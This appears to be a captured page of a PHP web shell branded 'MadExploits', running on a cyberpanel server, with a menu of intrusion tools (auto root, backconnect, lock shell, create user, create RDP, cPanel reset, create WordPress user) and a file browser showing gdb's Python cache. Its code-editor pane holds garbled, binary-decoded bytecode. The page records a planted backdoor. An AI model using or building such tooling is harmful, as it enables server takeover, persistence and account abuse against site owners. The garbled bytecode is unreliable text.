Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
gdb /
python /
gdb /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
FrameDecorator.cpython-310.pyc
7.14
KB
-rw-r--r--
FrameIterator.cpython-310.pyc
1.2
KB
-rw-r--r--
__init__.cpython-310.pyc
5.77
KB
-rw-r--r--
frames.cpython-310.pyc
5.32
KB
-rw-r--r--
printing.cpython-310.pyc
8.63
KB
-rw-r--r--
prompt.cpython-310.pyc
3.36
KB
-rw-r--r--
types.cpython-310.pyc
4.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FrameDecorator.cpython-310.pyc
o ��nb�( � @ s\ d dl Z ze W n ey eZY nw G dd� de�ZG dd� de�ZG dd� de�ZdS )� Nc @ sf e Zd ZdZ dd� Zedd� �Zdd� Zdd � Zd d� Z dd � Z dd� Zdd� Zdd� Z dd� ZdS )�FrameDecoratorz)Basic implementation of a Frame Decoratorc C s || _ d S �N)�_base)�self�base� r �+/usr/share/gdb/python/gdb/FrameDecorator.py�__init__= s zFrameDecorator.__init__c C s: | � � }|jr|jjr| �� tjks| �� tjkrdS dS )zIInternal utility to determine if the frame is special or limited.TF)�find_sal�symtab�filename�type�gdb�DUMMY_FRAME�SIGTRAMP_FRAME)�frame�salr r r �_is_limited_frame@ s ��z FrameDecorator._is_limited_framec C s t | jd�r| j�� S dS )zLReturn any elided frames that this class might be wrapping, or None.�elidedN)�hasattrr r �r r r r r Q s zFrameDecorator.elidedc C st t | jtj�st| jd�r| j�� S | �� }|�� tjkrdS |�� tj kr(dS |�� }|du r6|� � }|S t|�S )a� Return the name of the frame's function or an address of the function of the frame. First determine if this is a special frame. If not, try to determine filename from GDB's frame internal function API. Finally, if a name cannot be determined return the address. If this function returns an address, GDB will attempt to determine the function name from its internal minimal symbols store (for example, for inferiors without debug-info).�functionz<function called from gdb>z<signal handler called>N)� isinstancer r �Framer r �inferior_framer r r �pc�str)r r �funcr r r r r Y s zFrameDecorator.functionc C s&